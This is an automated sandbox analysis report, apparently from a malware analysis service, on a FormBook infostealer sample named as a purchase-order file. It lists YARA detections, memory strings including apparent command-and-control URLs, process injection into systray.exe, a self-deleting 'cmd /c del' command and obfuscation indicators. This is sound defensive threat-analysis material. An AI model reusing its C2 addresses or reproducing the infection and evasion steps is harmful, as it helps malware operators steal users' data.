          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnalv
          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnbio
          Source: PO#560.zip.exeString found in binary or memory: https://github.com/michel-pi/EasyBot.Net
          Source: systray.exe, 0000000A.00000002.485148191.00000000053BF000.00000004.00000001.sdmpString found in binary or memory: https://my.bigcartel.com;
          Source: systray.exe, 0000000A.00000002.485148191.00000000053BF000.00000004.00000001.sdmpString found in binary or memory: https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G
          Source: systray.exe, 0000000A.00000002.485148191.00000000053BF000.00000004.00000001.sdmpString found in binary or memory: https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3
          Source: PO#560.zip.exe, 00000000.00000002.233962937.0000000001540000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PO#560.zip.exe
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00419E0B NtReadFile,
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A0AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A0A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A0B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A0A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A09B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C9E90 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C9E8A NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C9E0B NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C9F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_017AC204
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_017AE630
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_017AE620
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE0B20
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE1EC8
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE46B0
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE4F70
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE7CF5
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE4C78
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE0A98
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE23C8
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE0040
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE0007
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE4958
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE494B
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE1EB8
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE46A1
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE6E98
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE6E88
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE0FE8
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE0FD8
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE4F60
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE4C69
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE15E8
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE15A8
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE6510
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE6500
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041E841
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041D018
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041E1FC
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00409E40
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00409E3B
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041E7E7
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00402FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8D466
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A925DD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DD5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A92D07
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C0D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A91D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A92EF7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E6E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8D616
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A91FF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A9DFCE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A920A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DB090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A928EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A9E824
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CF900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E4120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A922AE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A7FA2B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FEBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A803DA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8DBD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A92B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008CE1FC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008B2D87
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008B2D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008B9E3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008B9E40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008B2FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 049CB150 appears 45 times
          Source: PO#560.zip.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PO#560.zip.exe, 00000000.00000002.233441652.0000000000E18000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameW vs PO#560.zip.exe
          Source: PO#560.zip.exe, 00000000.00000002.236012959.000000000473C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs PO#560.zip.exe
          Source: PO#560.zip.exe, 00000000.00000002.247662573.0000000007850000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PO#560.zip.exe
          Source: PO#560.zip.exe, 00000000.00000002.234946752.0000000003231000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMetroFramework.dll> vs PO#560.zip.exe
          Source: PO#560.zip.exe, 00000000.00000002.233962937.0000000001540000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#560.zip.exe
          Source: PO#560.zip.exe, 00000004.00000002.279505547.00000000014C9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs PO#560.zip.exe
          Source: PO#560.zip.exe, 00000004.00000000.232128127.0000000000D58000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameW vs PO#560.zip.exe
          Source: PO#560.zip.exe, 00000004.00000002.279978802.000000000188F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO#560.zip.exe
          Source: PO#560.zip.exeBinary or memory string: OriginalFilenameW vs PO#560.zip.exe
          Source: PO#560.zip.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO#560.zip.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/3
          Source: C:\Users\user\Desktop\PO#560.zip.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#560.zip.exe.logJump to behavior
          Source: C:\Users\user\Desktop\PO#560.zip.exeMutant created: \Sessions\1\BaseNamedObjects\GxiiSkAr
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_01
          Source: PO#560.zip.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO#560.zip.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO#560.zip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO#560.zip.exeVirustotal: Detection: 32%
          Source: PO#560.zip.exeReversingLabs: Detection: 41%
          Source: unknownProcess created: C:\Users\user\Desktop\PO#560.zip.exe 'C:\Users\user\Desktop\PO#560.zip.exe'
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess created: C:\Users\user\Desktop\PO#560.zip.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO#560.zip.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess created: C:\Users\user\Desktop\PO#560.zip.exe {path}
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO#560.zip.exe'
          Source: C:\Users\user\Desktop\PO#560.zip.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO#560.zip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO#560.zip.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: PO#560.zip.exe, 00000004.00000002.279505547.00000000014C9000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: PO#560.zip.exe, 00000004.00000002.279505547.00000000014C9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO#560.zip.exe, 00000004.00000002.279978802.000000000188F000.00000040.00000001.sdmp, systray.exe, 0000000A.00000002.482167165.0000000004ABF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO#560.zip.exe, 00000004.00000002.279978802.000000000188F000.00000040.00000001.sdmp, systray.exe

          Data Obfuscation:

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)Show sources
          Source: PO#560.zip.exe, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
          Source: 0.2.PO#560.zip.exe.d60000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
          Source: 0.0.PO#560.zip.exe.d60000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
          Source: 4.0.PO#560.zip.exe.ca0000.0.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
          Source: 4.2.PO#560.zip.exe.ca0000.1.unpack, ImageManager/Main.cs.Net Code: LateBinding.LateCall(V_6, null, "Invoke", new object[] { 0, V_0 }, null, null)
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FEAEE5 push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE3FCA push dword ptr [esi]; iretd
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 0_2_02FE3FC3 push 36FFFFFFh; iretd
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_004170A0 pushfd ; retf
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0041CF0B push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008C70A0 pushfd ; retf
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008CCEB5 push eax; ret
